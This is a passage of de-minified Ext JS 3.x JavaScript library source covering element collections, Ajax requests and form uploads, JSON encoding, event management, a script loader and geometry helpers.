if (typeof d == "string") {
d = Ext.Element.selectorFunction(d, b)
} else {
if (d.isComposite) {
d = d.elements
} else {
if (!Ext.isIterable(d)) {
d = [d]
}
}
}
for (var c = 0, a = d.length; c < a; ++c) {
g.push(e.transformElement(d[c]))
}
return e
}, invoke:function (g, b) {
var h = this, d = h.elements, a = d.length, j, c;
for (c = 0; c < a; c++) {
j = d[c];
if (j) {
Ext.Element.prototype[g].apply(h.getElement(j), b)
}
}
return h
}, item:function (b) {
var d = this, c = d.elements[b], a = null;
if (c) {
a = d.getElement(c)
}
return a
}, addListener:function (b, j, h, g) {
var d = this.elements, a = d.length, c, k;
for (c = 0; c < a; c++) {
k = d[c];
if (k) {
Ext.EventManager.on(k, b, j, h || k, g)
}
}
return this
}, each:function (g, d) {
var h = this, c = h.elements, a = c.length, b, j;
for (b = 0; b < a; b++) {
j = c[b];
if (j) {
j = this.getElement(j);
if (g.call(d || j, j, h, b) === false) {
break
}
}
}
return h
}, fill:function (a) {
var b = this;
b.elements = [];
b.add(a);
return b
}, filter:function (a) {
var b = [], d = this, c = Ext.isFunction(a) ? a : function (e) {
return e.is(a)
};
d.each(function (h, e, g) {
if (c(h, g) !== false) {
b[b.length] = d.transformElement(h)
}
});
d.elements = b;
return d
}, indexOf:function (a) {
return this.elements.indexOf(this.transformElement(a))
}, replaceElement:function (e, c, a) {
var b = !isNaN(e) ? e : this.indexOf(e), g;
if (b > -1) {
c = Ext.getDom(c);
if (a) {
g = this.elements[b];
g.parentNode.insertBefore(c, g);
Ext.removeNode(g)
}
this.elements.splice(b, 1, c)
}
return this
}, clear:function () {
this.elements = []
}};
Ext.CompositeElementLite.prototype.on = Ext.CompositeElementLite.prototype.addListener;
Ext.CompositeElementLite.importElementMethods = function () {
var c, b = Ext.Element.prototype, a = Ext.CompositeElementLite.prototype;
for (c in b) {
if (typeof b[c] == "function") {
(function (d) {
a[d] = a[d] || function () {
return this.invoke(d, arguments)
}
}).call(a, c)
}
}
};
Ext.CompositeElementLite.importElementMethods();
if (Ext.DomQuery) {
Ext.Element.selectorFunction = Ext.DomQuery.select
}
Ext.Element.select = function (a, b) {
var c;
if (typeof a == "string") {
c = Ext.Element.selectorFunction(a, b)
} else {
if (a.length !== undefined) {
c = a
} else {
throw"Invalid selector"
}
}
return new Ext.CompositeElementLite(c)
};
Ext.select = Ext.Element.select;
(function () {
var b = "beforerequest", e = "requestcomplete", d = "requestexception", h = undefined, c = "load", i = "POST", a = "GET", g = window;
Ext.data.Connection = function (j) {
Ext.apply(this, j);
this.addEvents(b, e, d);
Ext.data.Connection.superclass.constructor.call(this)
};
Ext.extend(Ext.data.Connection, Ext.util.Observable, {timeout:30000, autoAbort:false, disableCaching:true, disableCachingParam:"_dc", request:function (n) {
var s = this;
if (s.fireEvent(b, s, n)) {
if (n.el) {
if (!Ext.isEmpty(n.indicatorText)) {
s.indicatorText = '<div class="loading-indicator">' + n.indicatorText + "</div>"
}
if (s.indicatorText) {
Ext.getDom(n.el).innerHTML = s.indicatorText
}
n.success = (Ext.isFunction(n.success) ? n.success : function () {
}).createInterceptor(function (o) {
Ext.getDom(n.el).innerHTML = o.responseText
})
}
var l = n.params, k = n.url || s.url, j, q = {success:s.handleResponse, failure:s.handleFailure, scope:s, argument:{options:n}, timeout:Ext.num(n.timeout, s.timeout)}, m, t;
if (Ext.isFunction(l)) {
l = l.call(n.scope || g, n)
}
l = Ext.urlEncode(s.extraParams, Ext.isObject(l) ? Ext.urlEncode(l) : l);
if (Ext.isFunction(k)) {
k = k.call(n.scope || g, n)
}
if ((m = Ext.getDom(n.form))) {
k = k || m.action;
if (n.isUpload || (/multipart\/form-data/i.test(m.getAttribute("enctype")))) {
return s.doFormUpload.call(s, n, l, k)
}
t = Ext.lib.Ajax.serializeForm(m);
l = l ? (l + "&" + t) : t
}
j = n.method || s.method || ((l || n.xmlData || n.jsonData) ? i : a);
if (j === a && (s.disableCaching && n.disableCaching !== false) || n.disableCaching === true) {
var r = n.disableCachingParam || s.disableCachingParam;
k = Ext.urlAppend(k, r + "=" + (new Date().getTime()))
}
n.headers = Ext.applyIf(n.headers || {}, s.defaultHeaders || {});
if (n.autoAbort === true || s.autoAbort) {
s.abort()
}
if ((j == a || n.xmlData || n.jsonData) && l) {
k = Ext.urlAppend(k, l);
l = ""
}
return(s.transId = Ext.lib.Ajax.request(j, k, q, l, n))
} else {
return n.callback ? n.callback.apply(n.scope, [n, h, h]) : null
}
}, isLoading:function (j) {
return j ? Ext.lib.Ajax.isCallInProgress(j) : !!this.transId
}, abort:function (j) {
if (j || this.isLoading()) {
Ext.lib.Ajax.abort(j || this.transId)
}
}, handleResponse:function (j) {
this.transId = false;
var k = j.argument.options;
j.argument = k ? k.argument : null;
this.fireEvent(e, this, j, k);
if (k.success) {
k.success.call(k.scope, j, k)
}
if (k.callback) {
k.callback.call(k.scope, k, true, j)
}
}, handleFailure:function (j, l) {
this.transId = false;
var k = j.argument.options;
j.argument = k ? k.argument : null;
this.fireEvent(d, this, j, k, l);
if (k.failure) {
k.failure.call(k.scope, j, k)
}
if (k.callback) {
k.callback.call(k.scope, k, false, j)
}
}, doFormUpload:function (q, j, k) {
var l = Ext.id(), v = document, r = v.createElement("iframe"), m = Ext.getDom(q.form), u = [], t, p = "multipart/form-data", n = {target:m.target, method:m.method, encoding:m.encoding, enctype:m.enctype, action:m.action};
Ext.fly(r).set({id:l, name:l, cls:"x-hidden", src:Ext.SSL_SECURE_URL});
v.body.appendChild(r);
if (Ext.isIE) {
document.frames[l].name = l
}
Ext.fly(m).set({target:l, method:i, enctype:p, encoding:p, action:k || n.action});
Ext.iterate(Ext.urlDecode(j, false), function (w, o) {
t = v.createElement("input");
Ext.fly(t).set({type:"hidden", value:o, name:w});
m.appendChild(t);
u.push(t)
});
function s() {
var x = this, w = {responseText:"", responseXML:null, argument:q.argument}, A, z;
try {
A = r.contentWindow.document || r.contentDocument || g.frames[l].document;
if (A) {
if (A.body) {
if (/textarea/i.test((z = A.body.firstChild || {}).tagName)) {
w.responseText = z.value
} else {
w.responseText = A.body.innerHTML
}
}
w.responseXML = A.XMLDocument || A
}
} catch (y) {
}
Ext.EventManager.removeListener(r, c, s, x);
x.fireEvent(e, x, w, q);
function o(D, C, B) {
if (Ext.isFunction(D)) {
D.apply(C, B)
}
}
o(q.success, q.scope, [w, q]);
o(q.callback, q.scope, [q, true, w]);
if (!x.debugUploads) {
setTimeout(function () {
Ext.removeNode(r)
}, 100)
}
}
Ext.EventManager.on(r, c, s, this);
m.submit();
Ext.fly(m).set(n);
Ext.each(u, function (o) {
Ext.removeNode(o)
})
}})
})();
Ext.Ajax = new Ext.data.Connection({autoAbort:false, serializeForm:function (a) {
return Ext.lib.Ajax.serializeForm(a)
}});
Ext.util.JSON = new (function () {
var useHasOwn = !!{}.hasOwnProperty, isNative = function () {
var useNative = null;
return function () {
if (useNative === null) {
useNative = Ext.USE_NATIVE_JSON && window.JSON && JSON.toString() == "[object JSON]"
}
return useNative
}
}(), pad = function (n) {
return n < 10 ? "0" + n : n
}, doDecode = function (json) {
return json ? eval("(" + json + ")") : ""
}, doEncode = function (o) {
if (!Ext.isDefined(o) || o === null) {
return"null"
} else {
if (Ext.isArray(o)) {
return encodeArray(o)
} else {
if (Ext.isDate(o)) {
return Ext.util.JSON.encodeDate(o)
} else {
if (Ext.isString(o)) {
return encodeString(o)
} else {
if (typeof o == "number") {
return isFinite(o) ? String(o) : "null"
} else {
if (Ext.isBoolean(o)) {
return String(o)
} else {
var a = ["{"], b, i, v;
for (i in o) {
if (!o.getElementsByTagName) {
if (!useHasOwn || o.hasOwnProperty(i)) {
v = o[i];
switch (typeof v) {
case"undefined":
case"function":
case"unknown":
break;
default:
if (b) {
a.push(",")
}
a.push(doEncode(i), ":", v === null ? "null" : doEncode(v));
b = true
}
}
}
}
a.push("}");
return a.join("")
}
}
}
}
}
}
}, m = {"\b":"\\b", "\t":"\\t", "\n":"\\n", "\f":"\\f", "\r":"\\r", '"':'\\"', "\\":"\\\\"}, encodeString = function (s) {
if (/["\\\x00-\x1f]/.test(s)) {
return'"' + s.replace(/([\x00-\x1f\\"])/g, function (a, b) {
var c = m[b];
if (c) {
return c
}
c = b.charCodeAt();
return"\\u00" + Math.floor(c / 16).toString(16) + (c % 16).toString(16)
}) + '"'
}
return'"' + s + '"'
}, encodeArray = function (o) {
var a = ["["], b, i, l = o.length, v;
for (i = 0; i < l; i += 1) {
v = o[i];
switch (typeof v) {
case"undefined":
case"function":
case"unknown":
break;
default:
if (b) {
a.push(",")
}
a.push(v === null ? "null" : Ext.util.JSON.encode(v));
b = true
}
}
a.push("]");
return a.join("")
};
this.encodeDate = function (o) {
return'"' + o.getFullYear() + "-" + pad(o.getMonth() + 1) + "-" + pad(o.getDate()) + "T" + pad(o.getHours()) + ":" + pad(o.getMinutes()) + ":" + pad(o.getSeconds()) + '"'
};
this.encode = function () {
var ec;
return function (o) {
if (!ec) {
ec = isNative() ? JSON.stringify : doEncode
}
return ec(o)
}
}();
this.decode = function () {
var dc;
return function (json) {
if (!dc) {
dc = isNative() ? JSON.parse : doDecode
}
return dc(json)
}
}()
})();
Ext.encode = Ext.util.JSON.encode;
Ext.decode = Ext.util.JSON.decode;
Ext.EventManager = function () {
var z, p, j = false, l = Ext.isGecko || Ext.isWebKit || Ext.isSafari, o = Ext.lib.Event, q = Ext.lib.Dom, c = document, A = window, r = "DOMContentLoaded", t = "complete", g = /^(?:scope|delay|buffer|single|stopEvent|preventDefault|stopPropagation|normalized|args|delegate)$/, u = [];
function n(E) {
var H = false, D = 0, C = u.length, F = false, G;
if (E) {
if (E.getElementById || E.navigator) {
for (; D < C; ++D) {
G = u[D];
if (G.el === E) {
H = G.id;
break
}
}
if (!H) {
H = Ext.id(E);
u.push({id:H, el:E});
F = true
}
} else {
H = Ext.id(E)
}
if (!Ext.elCache[H]) {
Ext.Element.addToCache(new Ext.Element(E), H);
if (F) {
Ext.elCache[H].skipGC = true
}
}
}
return H
}
function m(E, G, J, F, D, L) {
E = Ext.getDom(E);
var C = n(E), K = Ext.elCache[C].events, H;
H = o.on(E, G, D);
K[G] = K[G] || [];
K[G].push([J, D, L, H, F]);
if (E.addEventListener && G == "mousewheel") {
var I = ["DOMMouseScroll", D, false];
E.addEventListener.apply(E, I);
Ext.EventManager.addListener(A, "unload", function () {
E.removeEventListener.apply(E, I)
})
}
if (E == c && G == "mousedown") {
Ext.EventManager.stoppedMouseDownEvent.addListener(D)
}
}
function d() {
if (window != top) {
return false
}
try {
c.documentElement.doScroll("left")
} catch (C) {
return false
}
b();
return true
}
function B(C) {
if (Ext.isIE && d()) {
return true
}
if (c.readyState == t) {
b();
return true
}
j || (p = setTimeout(arguments.callee, 2));
return false
}
var k;
function i(C) {
k || (k = Ext.query("style, link[rel=stylesheet]"));
if (k.length == c.styleSheets.length) {
b();
return true
}
j || (p = setTimeout(arguments.callee, 2));
return false
}
function y(C) {
c.removeEventListener(r, arguments.callee, false);
i()
}
function b(C) {
if (!j) {
j = true;
if (p) {
clearTimeout(p)
}
if (l) {
c.removeEventListener(r, b, false)
}
if (Ext.isIE && B.bindIE) {
c.detachEvent("onreadystatechange", B)
}
o.un(A, "load", arguments.callee)
}
if (z && !Ext.isReady) {
Ext.isReady = true;
z.fire();
z.listeners = []
}
}
function a() {
z || (z = new Ext.util.Event());
if (l) {
c.addEventListener(r, b, false)
}
if (Ext.isIE) {
if (!B()) {
B.bindIE = true;
c.attachEvent("onreadystatechange", B)
}
} else {
if (Ext.isOpera) {
(c.readyState == t && i()) || c.addEventListener(r, y, false)
} else {
if (Ext.isWebKit) {
B()
}
}
}
o.on(A, "load", b)
}
function x(C, D) {
return function () {
var E = Ext.toArray(arguments);
if (D.target == Ext.EventObject.setEvent(E[0]).target) {
C.apply(this, E)
}
}
}
function w(D, E, C) {
return function (F) {
C.delay(E.buffer, D, null, [new Ext.EventObjectImpl(F)])
}
}
function s(G, F, C, E, D) {
return function (H) {
Ext.EventManager.removeListener(F, C, E, D);
G(H)
}
}
function e(D, E, C) {
return function (G) {
var F = new Ext.util.DelayedTask(D);
if (!C.tasks) {
C.tasks = []
}
C.tasks.push(F);
F.delay(E.delay || 10, D, null, [new Ext.EventObjectImpl(G)])
}
}
function h(H, G, C, J, K) {
var D = (!C || typeof C == "boolean") ? {} : C, E = Ext.getDom(H), F;
J = J || D.fn;
K = K || D.scope;
if (!E) {
throw'Error listening for "' + G + '". Element "' + H + "\" doesn't exist."
}
function I(M) {
if (!Ext) {
return
}
M = Ext.EventObject.setEvent(M);
var L;
if (D.delegate) {
if (!(L = M.getTarget(D.delegate, E))) {
return
}
} else {
L = M.target
}
if (D.stopEvent) {
M.stopEvent()
}
if (D.preventDefault) {
M.preventDefault()
}
if (D.stopPropagation) {
M.stopPropagation()
}
if (D.normalized === false) {
M = M.browserEvent
}
J.call(K || E, M, L, D)
}
if (D.target) {
I = x(I, D)
}
if (D.delay) {
I = e(I, D, J)
}
if (D.single) {
I = s(I, E, G, J, K)
}
if (D.buffer) {
F = new Ext.util.DelayedTask(I);
I = w(I, D, F)
}
m(E, G, J, F, I, K);
return I
}
var v = {addListener:function (E, C, G, F, D) {
if (typeof C == "object") {
var J = C, H, I;
for (H in J) {
I = J[H];
if (!g.test(H)) {
if (Ext.isFunction(I)) {
h(E, H, J, I, J.scope)
} else {
h(E, H, I)
}
}
}
} else {
h(E, C, D, G, F)
}
}, removeListener:function (E, I, M, N) {
E = Ext.getDom(E);
var C = n(E), K = E && (Ext.elCache[C].events)[I] || [], D, H, F, G, J, L;
for (H = 0, J = K.length; H < J; H++) {
if (Ext.isArray(L = K[H]) && L[0] == M && (!N || L[2] == N)) {
if (L[4]) {
L[4].cancel()
}
G = M.tasks && M.tasks.length;
if (G) {
while (G--) {
M.tasks[G].cancel()
}
delete M.tasks
}
D = L[1];
o.un(E, I, o.extAdapter ? L[3] : D);
if (D && E.addEventListener && I == "mousewheel") {
E.removeEventListener("DOMMouseScroll", D, false)
}
if (D && E == c && I == "mousedown") {
Ext.EventManager.stoppedMouseDownEvent.removeListener(D)
}
K.splice(H, 1);
if (K.length === 0) {
delete Ext.elCache[C].events[I]
}
for (G in Ext.elCache[C].events) {
return false
}
Ext.elCache[C].events = {};
return false
}
}
}, removeAll:function (E) {
E = Ext.getDom(E);
var D = n(E), J = Ext.elCache[D] || {}, M = J.events || {}, I, H, K, F, L, G, C;
for (F in M) {
if (M.hasOwnProperty(F)) {
I = M[F];
for (H = 0, K = I.length; H < K; H++) {
L = I[H];
if (L[4]) {
L[4].cancel()
}
if (L[0].tasks && (G = L[0].tasks.length)) {
while (G--) {
L[0].tasks[G].cancel()
}
delete L.tasks
}
C = L[1];
o.un(E, F, o.extAdapter ? L[3] : C);
if (E.addEventListener && C && F == "mousewheel") {
E.removeEventListener("DOMMouseScroll", C, false)
}
if (C && E == c && F == "mousedown") {
Ext.EventManager.stoppedMouseDownEvent.removeListener(C)
}
}
}
}
if (Ext.elCache[D]) {
Ext.elCache[D].events = {}
}
}, getListeners:function (F, C) {
F = Ext.getDom(F);
var H = n(F), D = Ext.elCache[H] || {}, G = D.events || {}, E = [];
if (G && G[C]) {
return G[C]
} else {
return null
}
}, purgeElement:function (E, C, G) {
E = Ext.getDom(E);
var D = n(E), J = Ext.elCache[D] || {}, K = J.events || {}, F, I, H;
if (G) {
if (K && K.hasOwnProperty(G)) {
I = K[G];
for (F = 0, H = I.length; F < H; F++) {
Ext.EventManager.removeListener(E, G, I[F][0])
}
}
} else {
Ext.EventManager.removeAll(E)
}
if (C && E && E.childNodes) {
for (F = 0, H = E.childNodes.length; F < H; F++) {
Ext.EventManager.purgeElement(E.childNodes[F], C, G)
}
}
}, _unload:function () {
var C;
for (C in Ext.elCache) {
Ext.EventManager.removeAll(C)
}
delete Ext.elCache;
delete Ext.Element._flyweights;
var G, D, F, E = Ext.lib.Ajax;
(typeof E.conn == "object") ? D = E.conn : D = {};
for (F in D) {
G = D[F];
if (G) {
E.abort({conn:G, tId:F})
}
}
}, onDocumentReady:function (E, D, C) {
if (Ext.isReady) {
z || (z = new Ext.util.Event());
z.addListener(E, D, C);
z.fire();
z.listeners = []
} else {
if (!z) {
a()
}
C = C || {};
C.delay = C.delay || 1;
z.addListener(E, D, C)
}
}, fireDocReady:b};
v.on = v.addListener;
v.un = v.removeListener;
v.stoppedMouseDownEvent = new Ext.util.Event();
return v
}();
Ext.onReady = Ext.EventManager.onDocumentReady;
(function () {
var a = function () {
var c = document.body || document.getElementsByTagName("body")[0];
if (!c) {
return false
}
var b = [" ", Ext.isIE ? "ext-ie " + (Ext.isIE6 ? "ext-ie6" : (Ext.isIE7 ? "ext-ie7" : (Ext.isIE8 ? "ext-ie8" : "ext-ie9"))) : Ext.isGecko ? "ext-gecko " + (Ext.isGecko2 ? "ext-gecko2" : "ext-gecko3") : Ext.isOpera ? "ext-opera" : Ext.isWebKit ? "ext-webkit" : ""];
if (Ext.isSafari) {
b.push("ext-safari " + (Ext.isSafari2 ? "ext-safari2" : (Ext.isSafari3 ? "ext-safari3" : "ext-safari4")))
} else {
if (Ext.isChrome) {
b.push("ext-chrome")
}
}
if (Ext.isMac) {
b.push("ext-mac")
}
if (Ext.isLinux) {
b.push("ext-linux")
}
if (Ext.isStrict || Ext.isBorderBox) {
var d = c.parentNode;
if (d) {
if (!Ext.isStrict) {
Ext.fly(d, "_internal").addClass("x-quirks");
if (Ext.isIE && !Ext.isStrict) {
Ext.isIEQuirks = true
}
}
Ext.fly(d, "_internal").addClass(((Ext.isStrict && Ext.isIE) || (!Ext.enableForcedBoxModel && !Ext.isIE)) ? " ext-strict" : " ext-border-box")
}
}
if (Ext.enableForcedBoxModel && !Ext.isIE) {
Ext.isForcedBorderBox = true;
b.push("ext-forced-border-box")
}
Ext.fly(c, "_internal").addClass(b);
return true
};
if (!a()) {
Ext.onReady(a)
}
})();
(function () {
var b = Ext.apply(Ext.supports, {correctRightMargin:true, correctTransparentColor:true, cssFloat:true});
var a = function () {
var g = document.createElement("div"), e = document, c, d;
g.innerHTML = '<div style="height:30px;width:50px;"><div style="height:20px;width:20px;"></div></div><div style="float:left;background-color:transparent;">';
e.body.appendChild(g);
d = g.lastChild;
if ((c = e.defaultView)) {
if (c.getComputedStyle(g.firstChild.firstChild, null).marginRight != "0px") {
b.correctRightMargin = false
}
if (c.getComputedStyle(d, null).backgroundColor != "transparent") {
b.correctTransparentColor = false
}
}
b.cssFloat = !!d.style.cssFloat;
e.body.removeChild(g)
};
if (Ext.isReady) {
a()
} else {
Ext.onReady(a)
}
})();
Ext.EventObject = function () {
var b = Ext.lib.Event, c = /(dbl)?click/, a = {3:13, 63234:37, 63235:39, 63232:38, 63233:40, 63276:33, 63277:34, 63272:46, 63273:36, 63275:35}, d = Ext.isIE ? {1:0, 4:1, 2:2} : {0:0, 1:1, 2:2};
Ext.EventObjectImpl = function (g) {
if (g) {
this.setEvent(g.browserEvent || g)
}
};
Ext.EventObjectImpl.prototype = {setEvent:function (h) {
var g = this;
if (h == g || (h && h.browserEvent)) {
return h
}
g.browserEvent = h;
if (h) {
g.button = h.button ? d[h.button] : (h.which ? h.which - 1 : -1);
if (c.test(h.type) && g.button == -1) {
g.button = 0
}
g.type = h.type;
g.shiftKey = h.shiftKey;
g.ctrlKey = h.ctrlKey || h.metaKey || false;
g.altKey = h.altKey;
g.keyCode = h.keyCode;
g.charCode = h.charCode;
g.target = b.getTarget(h);
g.xy = b.getXY(h)
} else {
g.button = -1;
g.shiftKey = false;
g.ctrlKey = false;
g.altKey = false;
g.keyCode = 0;
g.charCode = 0;
g.target = null;
g.xy = [0, 0]
}
return g
}, stopEvent:function () {
var e = this;
if (e.browserEvent) {
if (e.browserEvent.type == "mousedown") {
Ext.EventManager.stoppedMouseDownEvent.fire(e)
}
b.stopEvent(e.browserEvent)
}
}, preventDefault:function () {
if (this.browserEvent) {
b.preventDefault(this.browserEvent)
}
}, stopPropagation:function () {
var e = this;
if (e.browserEvent) {
if (e.browserEvent.type == "mousedown") {
Ext.EventManager.stoppedMouseDownEvent.fire(e)
}
b.stopPropagation(e.browserEvent)
}
}, getCharCode:function () {
return this.charCode || this.keyCode
}, getKey:function () {
return this.normalizeKey(this.keyCode || this.charCode)
}, normalizeKey:function (e) {
return Ext.isSafari ? (a[e] || e) : e
}, getPageX:function () {
return this.xy[0]
}, getPageY:function () {
return this.xy[1]
}, getXY:function () {
return this.xy
}, getTarget:function (g, h, e) {
return g ? Ext.fly(this.target).findParent(g, h, e) : (e ? Ext.get(this.target) : this.target)
}, getRelatedTarget:function () {
return this.browserEvent ? b.getRelatedTarget(this.browserEvent) : null
}, getWheelDelta:function () {
var g = this.browserEvent;
var h = 0;
if (g.wheelDelta) {
h = g.wheelDelta / 120
} else {
if (g.detail) {
h = -g.detail / 3
}
}
return h
}, within:function (h, i, e) {
if (h) {
var g = this[i ? "getRelatedTarget" : "getTarget"]();
return g && ((e ? (g == Ext.getDom(h)) : false) || Ext.fly(h).contains(g))
}
return false
}};
return new Ext.EventObjectImpl()
}();
Ext.Loader = Ext.apply({}, {load:function (j, i, k, c) {
var k = k || this, g = document.getElementsByTagName("head")[0], b = document.createDocumentFragment(), a = j.length, h = 0, e = this;
var l = function (m) {
g.appendChild(e.buildScriptTag(j[m], d))
};
var d = function () {
h++;
if (a == h && typeof i == "function") {
i.call(k)
} else {
if (c === true) {
l(h)
}
}
};
if (c === true) {
l.call(this, 0)
} else {
Ext.each(j, function (n, m) {
b.appendChild(this.buildScriptTag(n, d))
}, this);
g.appendChild(b)
}
}, buildScriptTag:function (b, c) {
var a = document.createElement("script");
a.type = "text/javascript";
a.src = b;
if (a.readyState) {
a.onreadystatechange = function () {
if (a.readyState == "loaded" || a.readyState == "complete") {
a.onreadystatechange = null;
c()
}
}
} else {
a.onload = c
}
return a
}});
Ext.ns("Ext.grid", "Ext.list", "Ext.dd", "Ext.tree", "Ext.form", "Ext.menu", "Ext.state", "Ext.layout.boxOverflow", "Ext.app", "Ext.ux", "Ext.chart", "Ext.direct", "Ext.slider");
Ext.apply(Ext, function () {
var c = Ext, a = 0, b = null;
return{emptyFn:function () {
}, BLANK_IMAGE_URL:Ext.isIE6 || Ext.isIE7 || Ext.isAir ? "http://www.extjs.com/s.gif" : "data:image/gif;base64,R0lGODlhAQABAID/AMDAwAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==", extendX:function (d, e) {
return Ext.extend(d, e(d.prototype))
}, getDoc:function () {
return Ext.get(document)
}, num:function (e, d) {
e = Number(Ext.isEmpty(e) || Ext.isArray(e) || typeof e == "boolean" || (typeof e == "string" && e.trim().length == 0) ? NaN : e);
return isNaN(e) ? d : e
}, value:function (g, d, e) {
return Ext.isEmpty(g, e) ? d : g
}, escapeRe:function (d) {
return d.replace(/([-.*+?^${}()|[\]\/\\])/g, "\\$1")
}, sequence:function (h, d, g, e) {
h[d] = h[d].createSequence(g, e)
}, addBehaviors:function (i) {
if (!Ext.isReady) {
Ext.onReady(function () {
Ext.addBehaviors(i)
})
} else {
var e = {}, h, d, g;
for (d in i) {
if ((h = d.split("@"))[1]) {
g = h[0];
if (!e[g]) {
e[g] = Ext.select(g)
}
e[g].on(h[1], i[d])
}
}
e = null
}
}, getScrollBarWidth:function (g) {
if (!Ext.isReady) {
return 0
}
if (g === true || b === null) {
var i = Ext.getBody().createChild('<div class="x-hide-offsets" style="width:100px;height:50px;overflow:hidden;"><div style="height:200px;"></div></div>'), h = i.child("div", true);
var e = h.offsetWidth;
i.setStyle("overflow", (Ext.isWebKit || Ext.isGecko) ? "auto" : "scroll");
var d = h.offsetWidth;
i.remove();
b = e - d + 2
}
return b
}, combine:function () {
var g = arguments, e = g.length, j = [];
for (var h = 0; h < e; h++) {
var d = g[h];
if (Ext.isArray(d)) {
j = j.concat(d)
} else {
if (d.length !== undefined && !d.substr) {
j = j.concat(Array.prototype.slice.call(d, 0))
} else {
j.push(d)
}
}
}
return j
}, copyTo:function (d, e, g) {
if (typeof g == "string") {
g = g.split(/[,;\s]/)
}
Ext.each(g, function (h) {
if (e.hasOwnProperty(h)) {
d[h] = e[h]
}
}, this);
return d
}, destroy:function () {
Ext.each(arguments, function (d) {
if (d) {
if (Ext.isArray(d)) {
this.destroy.apply(this, d)
} else {
if (typeof d.destroy == "function") {
d.destroy()
} else {
if (d.dom) {
d.remove()
}
}
}
}
}, this)
}, destroyMembers:function (l, j, g, h) {
for (var k = 1, e = arguments, d = e.length; k < d; k++) {
Ext.destroy(l[e[k]]);
delete l[e[k]]
}
}, clean:function (d) {
var e = [];
Ext.each(d, function (g) {
if (!!g) {
e.push(g)
}
});
return e
}, unique:function (d) {
var e = [], g = {};
Ext.each(d, function (h) {
if (!g[h]) {
e.push(h)
}
g[h] = true
});
return e
}, flatten:function (d) {
var g = [];
function e(h) {
Ext.each(h, function (i) {
if (Ext.isArray(i)) {
e(i)
} else {
g.push(i)
}
});
return g
}
return e(d)
}, min:function (d, e) {
var g = d[0];
e = e || function (i, h) {
return i < h ? -1 : 1
};
Ext.each(d, function (h) {
g = e(g, h) == -1 ? g : h
});
return g
}, max:function (d, e) {
var g = d[0];
e = e || function (i, h) {
return i > h ? 1 : -1
};
Ext.each(d, function (h) {
g = e(g, h) == 1 ? g : h
});
return g
}, mean:function (d) {
return d.length > 0 ? Ext.sum(d) / d.length : undefined
}, sum:function (d) {
var e = 0;
Ext.each(d, function (g) {
e += g
});
return e
}, partition:function (d, e) {
var g = [
[],
[]
];
Ext.each(d, function (j, k, h) {
g[(e && e(j, k, h)) || (!e && j) ? 0 : 1].push(j)
});
return g
}, invoke:function (d, e) {
var h = [], g = Array.prototype.slice.call(arguments, 2);
Ext.each(d, function (j, k) {
if (j && typeof j[e] == "function") {
h.push(j[e].apply(j, g))
} else {
h.push(undefined)
}
});
return h
}, pluck:function (d, g) {
var e = [];
Ext.each(d, function (h) {
e.push(h[g])
});
return e
}, zip:function () {
var n = Ext.partition(arguments, function (i) {
return typeof i != "function"
}), k = n[0], m = n[1][0], d = Ext.max(Ext.pluck(k, "length")), h = [];
for (var l = 0; l < d; l++) {
h[l] = [];
if (m) {
h[l] = m.apply(m, Ext.pluck(k, l))
} else {
for (var g = 0, e = k.length; g < e; g++) {
h[l].push(k[g][l])
}
}
}
return h
}, getCmp:function (d) {
return Ext.ComponentMgr.get(d)
}, useShims:c.isIE6 || (c.isMac && c.isGecko2), type:function (e) {
if (e === undefined || e === null) {
return false
}
if (e.htmlElement) {
return"element"
}
var d = typeof e;
if (d == "object" && e.nodeName) {
switch (e.nodeType) {
case 1:
return"element";
case 3:
return(/\S/).test(e.nodeValue) ? "textnode" : "whitespace"
}
}
if (d == "object" || d == "function") {
switch (e.constructor) {
case Array:
return"array";
case RegExp:
return"regexp";
case Date:
return"date"
}
if (typeof e.length == "number" && typeof e.item == "function") {
return"nodelist"
}
}
return d
}, intercept:function (h, d, g, e) {
h[d] = h[d].createInterceptor(g, e)
}, callback:function (d, h, g, e) {
if (typeof d == "function") {
if (e) {
d.defer(e, h, g || [])
} else {
d.apply(h, g || [])
}
}
}}
}());
Ext.apply(Function.prototype, {createSequence:function (b, a) {
var c = this;
return(typeof b != "function") ? this : function () {
var d = c.apply(this || window, arguments);
b.apply(a || this || window, arguments);
return d
}
}});
Ext.applyIf(String, {escape:function (a) {
return a.replace(/('|\\)/g, "\\$1")
}, leftPad:function (d, b, c) {
var a = String(d);
if (!c) {
c = " "
}
while (a.length < b) {
a = c + a
}
return a
}});
String.prototype.toggle = function (b, a) {
return this == b ? a : b
};
String.prototype.trim = function () {
var a = /^\s+|\s+$/g;
return function () {
return this.replace(a, "")
}
}();
Date.prototype.getElapsed = function (a) {
return Math.abs((a || new Date()).getTime() - this.getTime())
};
Ext.applyIf(Number.prototype, {constrain:function (b, a) {
return Math.min(Math.max(this, b), a)
}});
Ext.lib.Dom.getRegion = function (a) {
return Ext.lib.Region.getRegion(a)
};
Ext.lib.Region = function (d, g, a, c) {
var e = this;
e.top = d;
e[1] = d;
e.right = g;
e.bottom = a;
e.left = c;
e[0] = c
};
Ext.lib.Region.prototype = {contains:function (b) {
var a = this;
return(b.left >= a.left && b.right <= a.right && b.top >= a.top && b.bottom <= a.bottom)
}, getArea:function () {
var a = this;
return((a.bottom - a.top) * (a.right - a.left))
}, intersect:function (h) {
var g = this, d = Math.max(g.top, h.top), e = Math.min(g.right, h.right), a = Math.min(g.bottom, h.bottom), c = Math.max(g.left, h.left);
if (a >= d && e >= c) {
return new Ext.lib.Region(d, e, a, c)
}
}, union:function (h) {
var g = this, d = Math.min(g.top, h.top), e = Math.max(g.right, h.right), a = Math.max(g.bottom, h.bottom), c = Math.min(g.left, h.left);
return new Ext.lib.Region(d, e, a, c)
}, constrainTo:function (b) {
var a = this;
a.top = a.top.constrain(b.top, b.bottom);
a.bottom = a.bottom.constrain(b.top, b.bottom);
a.left = a.left.constrain(b.left, b.right);
a.right = a.right.constrain(b.left, b.right);
return a
}, adjust:function (d, c, a, g) {
var e = this;
e.top += d;
e.left += c;
e.right += g;
e.bottom += a;
return e
}};
Ext.lib.Region.getRegion = function (e) {
var h = Ext.lib.Dom.getXY(e), d = h[1], g = h[0] + e.offsetWidth, a = h[1] + e.offsetHeight, c = h[0];
return new Ext.lib.Region(d, g, a, c)
};
Ext.lib.Point = function (a, c) {
if (Ext.isArray(a)) {
c = a[1];
a = a[0]
}
var b = this;
b.x = b.right = b.left = b[0] = a;
b.y = b.top = b.bottom = b[1] = c
};
Ext.lib.Point.prototype = new Ext.lib.Region();
Ext.apply(Ext.DomHelper, function () {
